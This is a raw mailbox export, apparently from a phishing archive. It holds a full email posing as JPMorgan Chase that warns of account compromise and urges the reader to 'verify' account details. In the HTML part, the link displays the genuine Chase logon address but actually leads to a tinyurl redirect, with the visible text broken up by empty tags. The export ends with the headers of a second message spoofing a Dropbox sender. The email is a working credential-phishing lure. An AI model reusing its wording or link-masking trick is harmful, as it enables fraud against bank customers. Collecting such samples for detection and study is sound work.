From: "Chase" <kiptrying1@suddenlink.net>
Date: Mon, 24 Aug 2015 01:36:04 -0600
Message-Id: <20150824073602.BJDV11272.txasav-vm06.suddenlink.net@[74.208.101.231]>
X-Cloudmark-Analysis: v=2.1 cv=TK/LSjVa c=1 sm=0 tr=0 a=8LaAqv5HAAAA:8 a=uRRa74qj2VoA:10 a=KXl77lDgDEgIEtoqJYcA:9 a=DmfBtuCuAAAA:8 a=YmCSkmc9J6b6VLY8a0AA:9 a=wPNLvfGTeEIA:10 a=OS0co_iWui0A:10 a=ropYaVpFAAAA:8 a=bcr71Kb-AAAA:20 a=UaCSvCwVAAAA:8 a=-WbYEInGCJF5WZdSxikA:9 a=CJnWMkO_o38sFS7b:21 a=_W_S_7VecoQA:10 a=brCfsoyvihAA:10
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 158

You will not see this in a MIME-aware mail reader.
--===============0317615443==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

  =

   	 =


 =

   =

  	 	  =

   =



Dear Customer: =


We are committed to providing the tools you need to help monitor your accou=
nt.

Your account has been recently compromised from a different ip location. Yo=
u are required to verify your account information to prevent account termin=
ation.


Click here: https://chaseonline.chase.com/Logon.aspx

Thank you for being our customer. We look forward to serving all of your fi=
nancial needs. =




Sincerely, =


JP Morgan Chase Bank, N.A. =


	 	 =

  =

 =

  =

    =

   =

   =

   =


 =

   Chase Privacy Operations, P.O. Box 659752, San Antonio, TX 78265-9752. =

=A9 2015 JPMorgan Chase & Co. =


LCM5430612=20
--===============0317615443==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><SPAN style=3D"TEXT-TRANSFORM: none; BACKGROUN=
D-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; BORDER-SPACING: 0px; BORDER-CO=
LLAPSE: separate; FONT: medium 'Lucida Grande'; WHITE-SPACE: normal; LETTER=
-SPACING: normal; COLOR: rgb(0,0,0); WORD-SPACING: 0px">
<DIV style=3D"FONT-FAMILY: Tahoma; FONT-SIZE: 10pt">
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D0 width=3D600 align=3Dcente=
r>
<TBODY>
<TR>
<TD align=3Dleft><IMG border=3D0 alt=3D"" src=3D"http://chusscsed.chase.ade=
ptra.net/1684/chase_logo.gif" width=3D155 height=3D51></TD>
<TD align=3Dright><BR></TD></TR></TBODY></TABLE>
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D0 width=3D600 align=3Dcente=
r>
<TBODY>
<TR>
<TD colSpan=3D5><IMG border=3D0 alt=3D"" src=3D"http://chusscsed.chase.adep=
tra.net/1684/v2_top.gif" width=3D600 height=3D34></TD></TR>
<TR>
<TD bgColor=3D#0467bc background=3Dhttp://chusscsed.chase.adeptra.net/1684/=
pix_blu.gif><IMG border=3D0 alt=3D"" src=3D"http://chusscsed.chase.adeptra.=
net/1684/pixel.gif" width=3D1 height=3D1></TD>
<TD><IMG border=3D0 alt=3D"" src=3D"http://chusscsed.chase.adeptra.net/1684=
/pixel.gif" width=3D18 height=3D1></TD>
<TD vAlign=3Dtop><IMG border=3D0 alt=3D"" src=3D"http://chusscsed.chase.ade=
ptra.net/1684/pixel.gif" width=3D400 height=3D1><SPAN>&nbsp;</SPAN><BR><FON=
T color=3D#000000 size=3D2 face=3Dverdana,arial,helvetica,sans-serif><SPAN>=
&nbsp;</SPAN></FONT><SPAN>&nbsp;<SPAN> </SPAN></SPAN><BR><FONT style=3D"LIN=
E-HEIGHT: 18px; FONT-SIZE: 12px" color=3D#000000 size=3D2 face=3Dverdana,ar=
ial,helvetica,sans-serif><BR><BR>Dear Customer:<SPAN>&nbsp;</SPAN><BR><BR>W=
e are committed to providing the tools you need to help monitor your accoun=
t.<BR><SPAN></SPAN><BR>Your account has been recently compromised from a di=
fferent ip location. You are required to verify your account information to=
 prevent account termination.<BR><BR></FONT><BR><FONT style=3D"LINE-HEIGHT:=
 18px; FONT-SIZE: 12px" color=3D#000000 size=3D2 face=3Dverdana,arial,helve=
tica,sans-serif>Click here: <SPAN><A href=3D"http://tinyurl.com/o2gdl8t" re=
l=3Dnoreferrer target=3D_blank><B><FONT style=3D"FONT-SIZE: 12px" color=3D#=
0000ff face=3Dverdana,arial,helvetica,sans-serif>https://chaseonline.cha<SP=
AN></SPAN><SPAN></SPAN>se.com/<WBR>Logon.aspx</FONT></B></A></SPAN><BR><BR>=
Thank you for being our customer. We look forward to serving all of your fi=
nancial needs.<SPAN>&nbsp;</SPAN><BR><BR><SPAN></SPAN><BR><BR>Sincerely,<SP=
AN> </SPAN><SPAN></SPAN><BR><BR>JP Morgan Chase Bank, N.A.<SPAN>&nbsp;</SPA=
N><BR><BR></FONT></TD>
<TD><IMG border=3D0 alt=3D"" src=3D"http://chusscsed.chase.adeptra.net/1684=
/pixel.gif" width=3D18 height=3D1></TD>
<TD bgColor=3D#0467bc background=3Dhttp://chusscsed.chase.adeptra.net/1684/=
pix_blu.gif><IMG border=3D0 alt=3D"" src=3D"http://chusscsed.chase.adeptra.=
net/1684/pixel.gif" width=3D1 height=3D1></TD></TR>
<TR>
<TD bgColor=3D#0467bc background=3Dhttp://chusscsed.chase.adeptra.net/1684/=
pix_blu.gif colSpan=3D5><IMG border=3D0 alt=3D"" src=3D"http://chusscsed.ch=
ase.adeptra.net/1684/pixel.gif" width=3D1 height=3D1></TD></TR></TBODY></TA=
BLE></DIV></SPAN><SPAN style=3D"TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb=
(255,255,255); TEXT-INDENT: 0px; DISPLAY: inline !important; FONT: 13px Ari=
al,sans-serif; WHITE-SPACE: normal; FLOAT: none; LETTER-SPACING: normal; CO=
LOR: rgb(0,0,0); WORD-SPACING: 0px"></SPAN>
<DIV style=3D"TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,255,255); TEX=
T-INDENT: 0px; FONT: 13px Arial,sans-serif; WHITE-SPACE: normal; LETTER-SPA=
CING: normal; COLOR: rgb(0,0,0); WORD-SPACING: 0px"><BR></DIV>
<DIV style=3D"TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,255,255); TEX=
T-INDENT: 0px; FONT: 12pt Tahoma; WHITE-SPACE: normal; LETTER-SPACING: norm=
al; COLOR: rgb(0,0,0); WORD-SPACING: 0px">
<TABLE border=3D0 cellSpacing=3D1 cellPadding=3D0 width=3D600 bgColor=3D#04=
67bc align=3Dcenter>
<TBODY>
<TR>
<TD bgColor=3D#ffffff>
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D0>
<TBODY>
<TR>
<TD></TD></TR>
<TR>
<TD>
<TABLE border=3D0 cellSpacing=3D8 cellPadding=3D0>
<TBODY>
<TR>
<TD></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR></TBODY><=
/TABLE><BR>
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D0 width=3D604 align=3Dcente=
r>
<TBODY>
<TR>
<TD><FONT style=3D"FONT-SIZE: 10px" color=3D#000000 size=3D2 face=3Dverdana=
,arial,helvetica,sans-serif>Chase Privacy Operations, P.O. Box 659752, San =
Antonio, TX 78265-9752.<SPAN>&nbsp;</SPAN><BR>=A9 2015 JPMorgan Chase &amp;=
 Co.<SPAN>&nbsp;</SPAN><BR><BR>LCM5430612<SPAN>&nbsp;</SPAN></FONT></TD></T=
R></TBODY></TABLE></DIV></BODY></HTML>
--===============0317615443==--

From fileshare@dropbox.com  Wed Aug 26 13:40:29 2015
Return-Path: <fileshare@dropbox.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from forward.b.hostedemail.com (forward.b.hostedemail.com [64.98.36.17])
	by l.monkey.org (Postfix) with ESMTP id 8D687F4005
	for <jose@login.monkey.org>; Wed, 26 Aug 2015 13:40:29 -0500 (CDT)
Received: from smtpin05.hostedemail.com (10.5.19.248.rfc1918.com [10.5.19.248])
	by ofarelay01.b.hostedemail.com (Postfix) with SMTP id 6021C34E382
	for <jose@login.monkey.org>; Wed, 26 Aug 2015 18:40:26 +0000 (UTC)
X-Forwarded-For: jose@monkey.org by Hostedemail
Delivered-To: jose@monkey.org
X-FDA: 70563767652.05.cats38_3dedc207e794b
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 50,0,0,4028deda69e6493f,d41d8cd98f00b204,fileshare@dropbox.com,:fileshare@dropbox.com,RULES_HIT:2:41:72:379:455:800:962:966:967:973:983:988:989:1189:1208:1221:1254:1260:1261:1263:1313:1314:1381:1431:1432:1433:1434:1436:1437:1516:1517:1518:1535:1567:1570:1571:1575:1588:1589:1592:1594:1714:1730:1777:1792:2194:2196:2198:2199:2200:2201:2525:2527:2549:2566:2610:2682:2685:2741:2859:2915:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3585:3867:3868:3871:3872:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4049:4119:4180:4181:4385:4552:4699:5007:6261:6650:6678:6687:7652:7903:8568:8603:8957:9025:9040:9388:9416:9908:10004:10049:10214:10234:10346:11233:11473:11657:11658:11914:12043:12438:12517:12519:12561:12679:12740:13110:13235:13236:13237:14106:14195:14515:21063:21080:21212:21222,0,RBL:neutral,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fs,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0
X-HE-Tag: cats38_3dedc207e794b
X-Filterd-Recvd-Size: 8632
Received: from server.flowsocietylacrosse.com (server.flowsocietylacrosse.com [192.163.229.113])
	by imf14.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 26 Aug 2015 18:40:25 +0000 (UTC)
Received: from [50.252.200.121] (port=60981 helo=[172.16.32.30])
	by server.flowsocietylacrosse.com with esmtpsa (TLSv1:DHE-RSA-AES256-SHA:256)
	(Exim 4.85)
	(envelope-from <fileshare@dropbox.com>)
	id 1ZUfcK-0005uA-FC; Wed, 26 Aug 2015 18:40:13 +0000
Content-Type: multipart/alternative; boundary="===============0811323890=="
MIME-Version: 1.0
Subject: PENDING NOTIFICATION 
To: Recipients <fileshare@dropbox.com>
